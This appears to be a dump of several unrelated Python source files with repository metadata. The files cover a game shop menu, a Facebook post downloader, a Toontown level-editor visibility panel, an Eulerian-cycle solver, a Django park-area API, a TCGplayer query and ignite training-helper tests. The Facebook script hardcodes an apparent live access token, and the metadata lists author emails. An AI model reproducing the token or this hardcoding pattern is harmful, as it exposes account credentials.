self.name = name
self.description = description
self.base = base
self.buybase = buybase
self.title_x = title_x
self.title_y = title_y
self.description_x = description_x
self.description_y = description_y
self.stock_x = stock_x
self.stock_y = stock_y
self.price_x = price_x
self.price_y = price_y
#draws in item values
def draw(self):
make_rect(win,white,self.base,9)
make_rect(win,red,self.base)
make_rect(win,red,self.buybase)
make_rect(win,white,self.buybase,7)
draw_text(f'{self.name}', white,self.title_x,self.title_y,18)
draw_text(f'{self.description}', white,self.description_x,self.description_y,14)
draw_text(str(self.stock) + ' ' + 'Owned', white,self.stock_x,self.stock_y,12)
draw_text('BUY: ' + '$' +str(self.price),white,self.price_x,self.price_y,12)
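# Illustrative instantiation (every number below is a made-up screen
# coordinate / price, not a value taken from the original game):
example_item = Menu(stock=0, price=100, name='Turret',
                    description='Automatically fires at targets',
                    base=(50, 50, 300, 120), buybase=(260, 130, 80, 30),
                    title_x=60, title_y=60, description_x=60, description_y=90,
                    stock_x=60, stock_y=115, price_x=270, price_y=138)
# example_item.draw() would then render this card onto `win` each frame.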
|
[
"vincentiusgabriel@yahoo.com"
] |
vincentiusgabriel@yahoo.com
|
f97a05fdd85f6b87c08c40f8b49371468b042c20
|
4323ef02073a8e3c9e6aceba738aef5fc72c3aa6
|
/RedesSociais/facebook_get_my_posts.py
|
5f2d06a1b1ec0aec89c7dfee3fd80bbb7cd69f32
|
[
"MIT"
] |
permissive
|
fotavio16/PycharmProjects
|
e1e57816b5a0dbda7d7921ac024a71c712adac78
|
f5be49db941de69159ec543e8a6dde61f9f94d86
|
refs/heads/master
| 2022-10-19T15:45:52.773005
| 2020-06-14T02:23:02
| 2020-06-14T02:23:02
| 258,865,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 752
|
py
|
import json
import facebook
import requests
if __name__ == '__main__':
token = "EAACEdEose0cBALLqHaIO4x1lD679BDZBGt1z2xtgp6UGHaW9WfJJ7osn6G8PQWHz1pJKxUqZBXZAsQSC8O1fCaGHs0yY8IIbvP7m6H7MMN8PZCZCdZCheOU9MJhBvREi42LCo2YRHcfoQQlZCNkBDc8Rc2dHRBRqw4F0MxjbmbYNh9qn2SsC44bg0x8wbTCnGgZD"
graph = facebook.GraphAPI(token)
posts = graph.get_connections('me', 'posts')
while True: # keep paginating
try:
with open('my_posts.jsonl', 'a') as f:
for post in posts['data']:
f.write(json.dumps(post)+"\n")
# get next page
posts = requests.get(posts['paging']['next']).json()
except KeyError:
# no more pages, break the loop
break
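# A short companion sketch for reading the dump back in (assumption: each line
# of my_posts.jsonl holds exactly one JSON-encoded post, as written above).
def load_my_posts(path='my_posts.jsonl'):
    with open(path) as f:
        return [json.loads(line) for line in f if line.strip()]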
|
[
"fotaviofonseca@gmail.com"
] |
fotaviofonseca@gmail.com
|
ff6ca8ca0c7b050f0d9b9dea92e61196b514d894
|
f9c318fcc249c9915df345ecc7bf4c14ff1dda36
|
/toontown/leveleditor/VisGroupsEditor.py
|
d0e4b319f10132cf428974e6b002d05bed7b3949
|
[] |
no_license
|
Benjamin8693/TTOpenLevelEditor
|
b72173bbe1f888d1f30af03714275a71b34cc335
|
037c6aead9de24b5291b998ed7d3e88e7d264687
|
refs/heads/master
| 2023-01-22T09:18:34.520541
| 2020-12-04T19:06:02
| 2020-12-04T19:06:02
| 300,377,917
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,946
|
py
|
import Pmw
import sys
from direct.showbase.TkGlobal import *
from direct.tkwidgets.Tree import *
class VisGroupsEditor(Pmw.MegaToplevel):
def __init__(self, levelEditor, visGroups = ['None'],
parent = None, **kw):
INITOPT = Pmw.INITOPT
optiondefs = (
('title', 'Visability Groups Editor', None),
)
self.defineoptions(kw, optiondefs)
Pmw.MegaToplevel.__init__(self, parent, title = self['title'])
if sys.platform == 'win32':
# FIXME: This doesn't work in other platforms for some reason...
self.iconbitmap("resources/openttle_ico_temp.ico")
self.levelEditor = levelEditor
self.visGroups = visGroups
self.visGroupNames = [pair[1].getName() for pair in self.visGroups]
# Initialize dictionary of visibility relationships
self.visDict = {}
# Group we are currently setting visGroups for
self.target = None
# Flag to enable/disable toggleVisGroup command
self.fCommand = 1
# Handle to the toplevels hull
hull = self.component('hull')
balloon = self.balloon = Pmw.Balloon(hull)
# Start with balloon help disabled
self.balloon.configure(state = 'none')
menuFrame = Frame(hull, relief = GROOVE, bd = 2)
menuFrame.pack(fill = X, expand = 1)
menuBar = Pmw.MenuBar(menuFrame, hotkeys = 1, balloon = balloon)
menuBar.pack(side = LEFT, expand = 1, fill = X)
menuBar.addmenu('Vis Groups Editor',
'Visability Groups Editor Operations')
menuBar.addmenuitem('Vis Groups Editor', 'command',
'Exit Visability Groups Editor',
label = 'Exit',
command = self.preDestroy)
menuBar.addmenu('Help', 'Visability Groups Editor Help Operations')
self.toggleBalloonVar = IntVar()
self.toggleBalloonVar.set(0)
menuBar.addmenuitem('Help', 'checkbutton',
'Toggle balloon help',
label = 'Balloon Help',
variable = self.toggleBalloonVar,
command = self.toggleBalloon)
# Create a combo box to choose target vis group
self.targetSelector = Pmw.ComboBox(
hull, labelpos = W, label_text = 'Target Vis Group:',
entry_width = 12, selectioncommand = self.selectVisGroup,
scrolledlist_items = self.visGroupNames)
self.targetSelector.selectitem(self.visGroupNames[0])
self.targetSelector.pack(expand = 1, fill = X)
# Scrolled frame to hold radio selector
sf = Pmw.ScrolledFrame(hull, horizflex = 'elastic',
usehullsize = 1, hull_width = 200,
hull_height = 400)
frame = sf.interior()
sf.pack(padx = 5, pady = 3, fill = BOTH, expand = 1)
# Add vis groups selector
self.selected = Pmw.RadioSelect(frame, selectmode = MULTIPLE,
orient = VERTICAL,
pady = 0,
command = self.toggleVisGroup)
for groupInfo in self.visGroups:
nodePath = groupInfo[0]
group = groupInfo[1]
name = group.getName()
self.selected.add(name, width = 12)
# Assemble list of groups visible from this group
visible = []
for i in range(group.getNumVisibles()):
visible.append(group.getVisibleName(i))
visible.sort()
self.visDict[name] = [nodePath, group, visible]
# Pack the widget
self.selected.pack(expand = 1, fill = X)
# And make sure scrolled frame is happy
sf.reposition()
buttonFrame = Frame(hull)
buttonFrame.pack(fill = X, expand = 1)
self.showMode = IntVar()
self.showMode.set(0)
self.showAllButton = Radiobutton(buttonFrame, text = 'Show All',
value = 0, indicatoron = 1,
variable = self.showMode,
command = self.refreshVisibility)
self.showAllButton.pack(side = LEFT, fill = X, expand = 1)
self.showActiveButton = Radiobutton(buttonFrame, text = 'Show Target',
value = 1, indicatoron = 1,
variable = self.showMode,
command = self.refreshVisibility)
self.showActiveButton.pack(side = LEFT, fill = X, expand = 1)
# Make sure input variables processed
self.initialiseoptions(VisGroupsEditor)
# Switch to current target's list
self.selectVisGroup(self.visGroupNames[0])
def selectVisGroup(self, target):
print('Setting vis options for group:', target)
# Record current target
oldTarget = self.target
# Record new target
self.target = target
# Deselect buttons from old target (first deactivating command)
self.fCommand = 0
if oldTarget:
visList = self.visDict[oldTarget][2]
for group in visList:
self.selected.invoke(self.selected.index(group))
# Now set buttons to reflect state of new target
visList = self.visDict[target][2]
for group in visList:
self.selected.invoke(self.selected.index(group))
# Reactivate command
self.fCommand = 1
# Update scene
self.refreshVisibility()
def toggleVisGroup(self, groupName, state):
if self.fCommand:
targetInfo = self.visDict[self.target]
target = targetInfo[1]
visList = targetInfo[2]
groupNP = self.visDict[groupName][0]
group = self.visDict[groupName][1]
# MRM: Add change in visibility here
# Show all vs. show active
if state == 1:
print('Vis Group:', self.target, 'adding group:', groupName)
if groupName not in visList:
visList.append(groupName)
target.addVisible(groupName)
# Update vis and color
groupNP.show()
groupNP.setColor(1, 0, 0, 1)
else:
print('Vis Group:', self.target, 'removing group:', groupName)
if groupName in visList:
visList.remove(groupName)
target.removeVisible(groupName)
# Update vis and color
if self.showMode.get() == 1:
groupNP.hide()
groupNP.clearColor()
# Update scene
self.refreshVisibility()
def refreshVisibility(self):
# Get current visibility list for target
targetInfo = self.visDict[self.target]
visList = targetInfo[2]
for key in list(self.visDict.keys()):
groupNP = self.visDict[key][0]
if key in visList:
groupNP.show()
if key == self.target:
groupNP.setColor(0, 1, 0, 1)
else:
groupNP.setColor(1, 0, 0, 1)
else:
if self.showMode.get() == 0:
groupNP.show()
else:
groupNP.hide()
groupNP.clearColor()
def preDestroy(self):
# First clear level editor variable
self.levelEditor.vgpanel = None
self.destroy()
def toggleBalloon(self):
if self.toggleBalloonVar.get():
self.balloon.configure(state = 'balloon')
else:
self.balloon.configure(state = 'none')
|
[
"nathanstgeorge7@gmail.com"
] |
nathanstgeorge7@gmail.com
|
2e90571df71e3cdbc1cdd7a29ca3a6ea2c21a1d4
|
5187c411a1e2eff1233f6cfda11fdf4ef03a631d
|
/Genome_assembly/EulerianCycle.py
|
313f8ab043635a6325ac00e23a5cb50a3c0ee60c
|
[] |
no_license
|
OXPHOS/Bioinfo_Alg
|
dad1cea2a535e92fdc0a2bf0f18e1fe6e0545776
|
042ced4bf000c92253582a1e96952891cda3f5d9
|
refs/heads/master
| 2021-01-10T16:00:38.510749
| 2016-02-09T03:43:36
| 2016-02-09T03:43:36
| 51,345,069
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,731
|
py
|
'''
Solve the Eulerian path problem
Input: The adjacency list of an Eulerian directed graph.
Output: An Eulerian cycle in this graph.
Randomly pick a point to start.
If unexplored edges remain but there is no available move from the current node,
select a node on the existing path that still has unexplored edges,
then traverse the existing path starting from that node and continue along new edges.
EULERIANCYCLE(Graph) (modified)
form a cycle Cycle by randomly walking in Graph (don't visit the same edge twice!)
while there are unexplored edges in Graph
select a node newStart in Cycle with still unexplored edges
form Cycle' by traversing Cycle (starting at newStart) and then randomly walking
Cycle <- Cycle'
return Cycle
'''
import random
def input_to_graph(string):
'''
From strings to dict
'''
num_edges = 0
graph = {}
for line in string.splitlines():
line = line.split() # Remove all spaces
if len(line) != 0:
key = int(line[0]) # 1st: key. 2nd: ->.
graph[key] = map(int, line[2].split(','))
num_edges += (len(graph[key]))
return graph, num_edges
def output_path(path):
output = str(path[0])
for _ in range(1, len(path)):
output = output + '->' + str(path[_])
print output
def eulerian_path(string):
'''
Randomly pick a point to start.
    If unexplored edges remain but there is no available move from the current node,
    select a node on the existing path that still has unexplored edges,
    then traverse the existing path starting from that node and continue along new edges.
'''
# Generate graph dict, calculate total edges, initiate available nodes set
graph, num_edges = input_to_graph(string)
available_nodes = set()
graph_temp = graph
# Randomly pick a node and start
start_point = random.sample(graph_temp, 1) ##### RETURN A LIST!
path = start_point
current = start_point[0]
# Iterate
# 1). No available edges -->finish or startover
# 2). Only one available edge --> go and remove the current node
# 3). More than one available edge --> randomly pick one way and take down this node
while True:
#print graph_temp[current]
if len(graph_temp[current]) == 0:
if num_edges == 0:
break
elif num_edges < 0:
print 'ERROR!'
else:
# print available_nodes
new_start = random.choice(list(available_nodes))
index = path.index(new_start)
path = path[index : -1] + path[0 : index] + [new_start]
current = new_start
# print '--start over-- \n', path
elif len(graph_temp[current]) == 1:
available_nodes.discard(current) ###Remove this node if it is in the set, because there's no more available edges
num_edges -= 1
next = graph_temp[current].pop()
path.append(next)
current = next
# print current, available_nodes
# print 'busy node', path
else:
available_nodes.add(current)
num_edges -= 1
next = graph_temp[current].pop(random.randrange(len(graph_temp[current])))
path.append(next)
current = next
# print available_nodes
# print path
output_path(path)
string = ''' 0 -> 3
1 -> 0
2 -> 1,6
3 -> 2
4 -> 2
5 -> 4
6 -> 5,8
7 -> 9
8 -> 7
9 -> 6'''
eulerian_path(string)
|
[
"engelzora@gmail.com"
] |
engelzora@gmail.com
|
0f18e5511f665676cbc15007b1d148014be778bf
|
d872437facb6242075ee3951044445b29726f7ba
|
/kennywoodapi/views/parkarea.py
|
7210d95ed6b8ff6524631d0b3622cc54b117ffd5
|
[] |
no_license
|
bitomann/kennywood
|
31debe6e7cb139254f3055d645ef512f87983518
|
36ea56e5ecd2fb76564ef6d63b0b02feab7d9123
|
refs/heads/master
| 2023-08-15T09:37:10.552161
| 2020-05-29T18:01:39
| 2020-05-29T18:01:39
| 265,348,840
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,000
|
py
|
"""Park Areas for Kennywood Amusement Park"""
from django.http import HttpResponseServerError
from rest_framework.viewsets import ViewSet
from rest_framework.response import Response
from rest_framework import serializers
from rest_framework import status
from kennywoodapi.models import ParkArea, Attraction, Itinerary
class ParkAreaSerializer(serializers.HyperlinkedModelSerializer):
"""JSON serializer for park areas
Arguments:
serializers
"""
class Meta:
model = ParkArea
url = serializers.HyperlinkedIdentityField(
view_name='parkarea',
lookup_field='id'
)
fields = ('id', 'url', 'name', 'theme', 'attractions')
depth = 2
class ParkAreas(ViewSet):
"""Park Areas for Kennywood Amusement Park"""
def create(self, request):
"""Handle POST operations
Returns:
Response -- JSON serialized ParkArea instance
"""
newarea = ParkArea()
newarea.name = request.data["name"]
newarea.theme = request.data["theme"]
newarea.save()
serializer = ParkAreaSerializer(newarea, context={'request': request})
return Response(serializer.data)
def retrieve(self, request, pk=None):
"""Handle GET requests for single park area
Returns:
Response -- JSON serialized park area instance
"""
try:
area = ParkArea.objects.get(pk=pk)
serializer = ParkAreaSerializer(area, context={'request': request})
return Response(serializer.data)
except Exception as ex:
return HttpResponseServerError(ex)
def update(self, request, pk=None):
"""Handle PUT requests for a park area
Returns:
Response -- Empty body with 204 status code
"""
area = ParkArea.objects.get(pk=pk)
area.name = request.data["name"]
area.theme = request.data["theme"]
area.save()
return Response({}, status=status.HTTP_204_NO_CONTENT)
def destroy(self, request, pk=None):
"""Handle DELETE requests for a single park area
Returns:
Response -- 200, 404, or 500 status code
"""
try:
area = ParkArea.objects.get(pk=pk)
area.delete()
return Response({}, status=status.HTTP_204_NO_CONTENT)
except ParkArea.DoesNotExist as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)
except Exception as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def list(self, request):
"""Handle GET requests to park areas resource
Returns:
Response -- JSON serialized list of park areas
"""
areas = ParkArea.objects.all()
serializer = ParkAreaSerializer(
areas, many=True, context={'request': request})
return Response(serializer.data)
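# A minimal sketch of wiring this ViewSet into urls.py with a DRF router
# (assumption only -- the project's real urls.py is not part of this module
# and may register the view under a different prefix or basename).
def build_example_router():
    from rest_framework import routers
    router = routers.DefaultRouter(trailing_slash=False)
    router.register(r'parkareas', ParkAreas, 'parkarea')
    return router.urls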
|
[
"bito@bitomann.com"
] |
bito@bitomann.com
|
547845e3f6dc9b2e66fcb031a7cda1cd2a574533
|
516c8f7454febc3e071cf979a8bbb22148736c3b
|
/testCalls/test_call3.py
|
ac6c87bf814ea6ef3f38636320b75b254110dfc4
|
[] |
no_license
|
aymei2/EdisonProject
|
850f2a52ccced207893d872873cb07a64b6c88cb
|
0bd2dfced65c33b17b0d464bbb33953fd6823bb4
|
refs/heads/master
| 2023-07-06T13:31:47.796399
| 2021-08-14T23:55:15
| 2021-08-14T23:55:15
| 281,704,224
| 1
| 0
| null | 2021-08-14T23:55:16
| 2020-07-22T14:45:44
|
Python
|
UTF-8
|
Python
| false
| false
| 505
|
py
|
import requests
import json
from variables import *
url = "https://api.tcgplayer.com/catalog/products/"
headers = {
'accept': 'application/json',
"Authorization": "bearer " + access_token,
"includeSkus":"true"
}
payload = {
'limit': '100',
"categoryId":"2",
"productName":"Solemn Judgment",
}
response = requests.request("GET", url, headers=headers, params=payload)
json_response = json.loads(response.text)
json_pretty = json.dumps(json_response, indent=2, sort_keys=True)
print(json_pretty)
|
[
"amei@MDEV701.mak.local"
] |
amei@MDEV701.mak.local
|
509ecc5e938c56502addca688cbaf06a2aed2569
|
ae8c50137127eed98e9c879d6fec516d541a3a1c
|
/tests/ignite/contrib/engines/test_common.py
|
5520403c12c59b638fde9a09a59096c9a2fa2bfb
|
[
"BSD-3-Clause"
] |
permissive
|
Bartolo1024/ignite
|
ab348620bae492589b6b80a9b57ea20668a6328f
|
b087fef0bc5f97cda415c1c56f1cd589383c54be
|
refs/heads/master
| 2022-12-04T14:54:42.284440
| 2020-06-05T21:49:39
| 2020-06-05T21:49:39
| 269,961,799
| 0
| 0
|
BSD-3-Clause
| 2020-06-06T11:34:25
| 2020-06-06T11:34:24
| null |
UTF-8
|
Python
| false
| false
| 17,626
|
py
|
import os
from unittest.mock import MagicMock
import pytest
import torch
import torch.nn as nn
from torch.utils.data.distributed import DistributedSampler
import ignite.contrib.handlers as handlers
import ignite.distributed as idist
from ignite.contrib.engines.common import (
_setup_logging,
add_early_stopping_by_val_score,
save_best_model_by_val_score,
setup_any_logging,
setup_common_training_handlers,
setup_mlflow_logging,
setup_neptune_logging,
setup_plx_logging,
setup_tb_logging,
setup_trains_logging,
setup_visdom_logging,
setup_wandb_logging,
)
from ignite.engine import Engine, Events
from ignite.handlers import TerminateOnNan
class DummyModel(nn.Module):
def __init__(self):
super(DummyModel, self).__init__()
self.net = nn.Linear(1, 1)
def forward(self, x):
return self.net(x)
def _test_setup_common_training_handlers(dirname, device, rank=0, local_rank=0, distributed=False, lr_scheduler=None):
lr = 0.01
step_size = 100
gamma = 0.5
num_iters = 100
num_epochs = 10
model = DummyModel().to(device)
if distributed and "cuda" in device:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[local_rank,], output_device=local_rank)
optimizer = torch.optim.SGD(model.parameters(), lr=lr)
if lr_scheduler is None:
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=gamma)
elif isinstance(lr_scheduler, str) and lr_scheduler == "ignite|LRScheduler":
from ignite.contrib.handlers import LRScheduler
lr_scheduler = LRScheduler(torch.optim.lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=gamma))
elif isinstance(lr_scheduler, str) and lr_scheduler == "ignite":
from ignite.contrib.handlers import PiecewiseLinear
milestones_values = [(0, 0.0), (step_size, lr), (num_iters * (num_epochs - 1), 0.0)]
lr_scheduler = PiecewiseLinear(optimizer, param_name="lr", milestones_values=milestones_values)
else:
raise ValueError("Unknown lr_scheduler: {}".format(lr_scheduler))
def update_fn(engine, batch):
if (engine.state.iteration - 1) % 50 == 0:
print("- lr:", optimizer.param_groups[0]["lr"])
optimizer.zero_grad()
x = torch.tensor([batch], requires_grad=True, device=device)
y_pred = model(x)
loss = y_pred.mean()
loss.backward()
optimizer.step()
return loss
train_sampler = None
if distributed and idist.get_world_size() > 1:
train_sampler = MagicMock(spec=DistributedSampler)
train_sampler.set_epoch = MagicMock()
trainer = Engine(update_fn)
setup_common_training_handlers(
trainer,
train_sampler=train_sampler,
to_save={"model": model, "optimizer": optimizer},
save_every_iters=75,
output_path=dirname,
lr_scheduler=lr_scheduler,
with_gpu_stats=False,
output_names=["batch_loss",],
with_pbars=True,
with_pbar_on_iters=True,
log_every_iters=50,
)
data = [i * 0.1 for i in range(num_iters)]
trainer.run(data, max_epochs=num_epochs)
# check handlers
handlers = trainer._event_handlers[Events.ITERATION_COMPLETED]
for cls in [
TerminateOnNan,
]:
assert any([isinstance(h[0], cls) for h in handlers]), "{}".format(handlers)
assert "batch_loss" in trainer.state.metrics
# Check saved checkpoint
if rank == 0:
checkpoints = list(os.listdir(dirname))
assert len(checkpoints) == 1
for v in [
"training_checkpoint",
]:
assert any([v in c for c in checkpoints])
# Check LR scheduling
assert optimizer.param_groups[0]["lr"] <= lr * gamma ** (num_iters * num_epochs / step_size), "{} vs {}".format(
optimizer.param_groups[0]["lr"], lr * gamma ** (num_iters * num_epochs / step_size)
)
def test_asserts_setup_common_training_handlers():
trainer = Engine(lambda e, b: None)
with pytest.raises(
ValueError, match=r"If to_save argument is provided then output_path argument should be also defined"
):
setup_common_training_handlers(trainer, to_save={})
with pytest.warns(UserWarning, match=r"Argument train_sampler is a distributed sampler"):
train_sampler = MagicMock(spec=DistributedSampler)
setup_common_training_handlers(trainer, train_sampler=train_sampler)
with pytest.warns(UserWarning, match=r"Argument device is unused and deprecated"):
setup_common_training_handlers(trainer, device="cpu")
def test_no_warning_with_train_sampler(recwarn):
from torch.utils.data import RandomSampler
trainer = Engine(lambda e, b: None)
train_sampler = RandomSampler([0, 1, 2])
setup_common_training_handlers(trainer, train_sampler=train_sampler)
assert len(recwarn) == 0, recwarn.pop()
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" not in os.environ, reason="Should have more than 1 worker")
def test_assert_setup_common_training_handlers_wrong_train_sampler(distributed_context_single_node_gloo):
trainer = Engine(lambda e, b: None)
from torch.utils.data.sampler import RandomSampler
with pytest.raises(TypeError, match=r"Train sampler should be torch DistributedSampler"):
train_sampler = RandomSampler([0, 1, 2, 3])
setup_common_training_handlers(trainer, train_sampler)
def test_setup_common_training_handlers(dirname, capsys):
_test_setup_common_training_handlers(dirname, device="cpu")
# Check epoch-wise pbar
captured = capsys.readouterr()
out = captured.err.split("\r")
out = list(map(lambda x: x.strip(), out))
out = list(filter(None, out))
assert "Epoch:" in out[-1], "{}".format(out[-1])
def test_save_best_model_by_val_score(dirname, capsys):
trainer = Engine(lambda e, b: None)
evaluator = Engine(lambda e, b: None)
model = DummyModel()
acc_scores = [0.1, 0.2, 0.3, 0.4, 0.3, 0.5, 0.6, 0.61, 0.7, 0.5]
@trainer.on(Events.EPOCH_COMPLETED)
def validate(engine):
evaluator.run(
[0,]
)
@evaluator.on(Events.EPOCH_COMPLETED)
def set_eval_metric(engine):
engine.state.metrics = {"acc": acc_scores[trainer.state.epoch - 1]}
save_best_model_by_val_score(dirname, evaluator, model, metric_name="acc", n_saved=2, trainer=trainer)
data = [
0,
]
trainer.run(data, max_epochs=len(acc_scores))
assert set(os.listdir(dirname)) == set(["best_model_8_val_acc=0.6100.pt", "best_model_9_val_acc=0.7000.pt"])
def test_add_early_stopping_by_val_score():
trainer = Engine(lambda e, b: None)
evaluator = Engine(lambda e, b: None)
acc_scores = [0.1, 0.2, 0.3, 0.4, 0.3, 0.3, 0.2, 0.1, 0.1, 0.0]
@trainer.on(Events.EPOCH_COMPLETED)
def validate(engine):
evaluator.run(
[0,]
)
@evaluator.on(Events.EPOCH_COMPLETED)
def set_eval_metric(engine):
engine.state.metrics = {"acc": acc_scores[trainer.state.epoch - 1]}
add_early_stopping_by_val_score(patience=3, evaluator=evaluator, trainer=trainer, metric_name="acc")
data = [
0,
]
state = trainer.run(data, max_epochs=len(acc_scores))
assert state.epoch == 7
def test_deprecated_setup_any_logging():
with pytest.raises(DeprecationWarning, match=r"is deprecated since 0\.4\.0\."):
setup_any_logging(None, None, None, None, None, None)
def test__setup_logging_wrong_args():
with pytest.raises(TypeError, match=r"Argument optimizers should be either a single optimizer or"):
_setup_logging(MagicMock(), MagicMock(), "abc", MagicMock(), 1)
with pytest.raises(TypeError, match=r"Argument evaluators should be either a single engine or"):
_setup_logging(MagicMock(), MagicMock(), MagicMock(spec=torch.optim.SGD), "abc", 1)
def _test_setup_logging(
setup_logging_fn,
kwargs_dict,
output_handler_cls,
opt_params_handler_cls,
with_eval=True,
with_optim=True,
as_class=False,
log_every_iters=1,
):
trainer = Engine(lambda e, b: b)
evaluators = None
optimizers = None
if with_eval:
evaluator = Engine(lambda e, b: None)
acc_scores = [0.1, 0.2, 0.3, 0.4, 0.3, 0.3, 0.2, 0.1, 0.1, 0.0]
@trainer.on(Events.EPOCH_COMPLETED)
def validate(engine):
evaluator.run(
[0,]
)
@evaluator.on(Events.EPOCH_COMPLETED)
def set_eval_metric(engine):
engine.state.metrics = {"acc": acc_scores[trainer.state.epoch - 1]}
evaluators = {"validation": evaluator}
if as_class:
evaluators = evaluators["validation"]
if with_optim:
t = torch.tensor([0,])
optimizers = {"optimizer": torch.optim.SGD([t,], lr=0.01)}
if as_class:
optimizers = optimizers["optimizer"]
kwargs_dict["trainer"] = trainer
kwargs_dict["optimizers"] = optimizers
kwargs_dict["evaluators"] = evaluators
kwargs_dict["log_every_iters"] = log_every_iters
x_logger = setup_logging_fn(**kwargs_dict)
handlers = trainer._event_handlers[Events.ITERATION_COMPLETED]
for cls in [
output_handler_cls,
]:
assert any([isinstance(h[0], cls) for h in handlers]), "{}".format(handlers)
if with_optim:
handlers = trainer._event_handlers[Events.ITERATION_STARTED]
for cls in [
opt_params_handler_cls,
]:
assert any([isinstance(h[0], cls) for h in handlers]), "{}".format(handlers)
if with_eval:
handlers = evaluator._event_handlers[Events.COMPLETED]
for cls in [
output_handler_cls,
]:
assert any([isinstance(h[0], cls) for h in handlers]), "{}".format(handlers)
data = [0, 1, 2]
trainer.run(data, max_epochs=10)
if "output_path" in kwargs_dict:
tb_files = list(os.listdir(kwargs_dict["output_path"]))
assert len(tb_files) == 1
for v in [
"events",
]:
assert any([v in c for c in tb_files]), "{}".format(tb_files)
return x_logger
def test_setup_tb_logging(dirname):
tb_logger = _test_setup_logging(
setup_logging_fn=setup_tb_logging,
kwargs_dict={"output_path": os.path.join(dirname, "t1")},
output_handler_cls=handlers.tensorboard_logger.OutputHandler,
opt_params_handler_cls=handlers.tensorboard_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
tb_logger.close()
tb_logger = _test_setup_logging(
setup_logging_fn=setup_tb_logging,
kwargs_dict={"output_path": os.path.join(dirname, "t2")},
output_handler_cls=handlers.tensorboard_logger.OutputHandler,
opt_params_handler_cls=handlers.tensorboard_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
tb_logger.close()
tb_logger = _test_setup_logging(
setup_logging_fn=setup_tb_logging,
kwargs_dict={"output_path": os.path.join(dirname, "t2")},
output_handler_cls=handlers.tensorboard_logger.OutputHandler,
opt_params_handler_cls=handlers.tensorboard_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
as_class=True,
log_every_iters=None,
)
tb_logger.close()
def test_setup_visdom_logging(visdom_server):
vis_logger = _test_setup_logging(
setup_logging_fn=setup_visdom_logging,
kwargs_dict={"server": visdom_server[0], "port": str(visdom_server[1])},
output_handler_cls=handlers.visdom_logger.OutputHandler,
opt_params_handler_cls=handlers.visdom_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
vis_logger.close()
vis_logger = _test_setup_logging(
setup_logging_fn=setup_visdom_logging,
kwargs_dict={"server": visdom_server[0], "port": str(visdom_server[1])},
output_handler_cls=handlers.visdom_logger.OutputHandler,
opt_params_handler_cls=handlers.visdom_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
vis_logger.close()
def test_setup_plx_logging():
os.environ["POLYAXON_NO_OP"] = "1"
_test_setup_logging(
setup_logging_fn=setup_plx_logging,
kwargs_dict={},
output_handler_cls=handlers.polyaxon_logger.OutputHandler,
opt_params_handler_cls=handlers.polyaxon_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
_test_setup_logging(
setup_logging_fn=setup_plx_logging,
kwargs_dict={},
output_handler_cls=handlers.polyaxon_logger.OutputHandler,
opt_params_handler_cls=handlers.polyaxon_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
def test_setup_mlflow_logging(dirname):
mlf_logger = _test_setup_logging(
setup_logging_fn=setup_mlflow_logging,
kwargs_dict={"tracking_uri": os.path.join(dirname, "p1")},
output_handler_cls=handlers.mlflow_logger.OutputHandler,
opt_params_handler_cls=handlers.mlflow_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
mlf_logger.close()
mlf_logger = _test_setup_logging(
setup_logging_fn=setup_mlflow_logging,
kwargs_dict={"tracking_uri": os.path.join(dirname, "p2")},
output_handler_cls=handlers.mlflow_logger.OutputHandler,
opt_params_handler_cls=handlers.mlflow_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
mlf_logger.close()
def test_setup_wandb_logging(dirname):
from unittest.mock import patch
with patch("ignite.contrib.engines.common.WandBLogger") as _:
setup_wandb_logging(MagicMock())
def test_setup_trains_logging():
handlers.trains_logger.TrainsLogger.set_bypass_mode(True)
with pytest.warns(UserWarning, match=r"running in bypass mode"):
trains_logger = _test_setup_logging(
setup_logging_fn=setup_trains_logging,
kwargs_dict={},
output_handler_cls=handlers.trains_logger.OutputHandler,
opt_params_handler_cls=handlers.trains_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
trains_logger.close()
trains_logger = _test_setup_logging(
setup_logging_fn=setup_trains_logging,
kwargs_dict={},
output_handler_cls=handlers.trains_logger.OutputHandler,
opt_params_handler_cls=handlers.trains_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
trains_logger.close()
def test_setup_neptune_logging(dirname):
npt_logger = _test_setup_logging(
setup_logging_fn=setup_neptune_logging,
kwargs_dict={"offline_mode": True},
output_handler_cls=handlers.neptune_logger.OutputHandler,
opt_params_handler_cls=handlers.neptune_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
npt_logger.close()
npt_logger = _test_setup_logging(
setup_logging_fn=setup_neptune_logging,
kwargs_dict={"offline_mode": True},
output_handler_cls=handlers.neptune_logger.OutputHandler,
opt_params_handler_cls=handlers.neptune_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
npt_logger.close()
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test_distrib_gpu(dirname, distributed_context_single_node_nccl):
local_rank = distributed_context_single_node_nccl["local_rank"]
device = "cuda:{}".format(local_rank)
_test_setup_common_training_handlers(dirname, device, rank=local_rank, local_rank=local_rank, distributed=True)
test_add_early_stopping_by_val_score()
@pytest.mark.distributed
def test_distrib_cpu(dirname, distributed_context_single_node_gloo):
device = "cpu"
local_rank = distributed_context_single_node_gloo["local_rank"]
_test_setup_common_training_handlers(dirname, device, rank=local_rank, local_rank=local_rank, distributed=True)
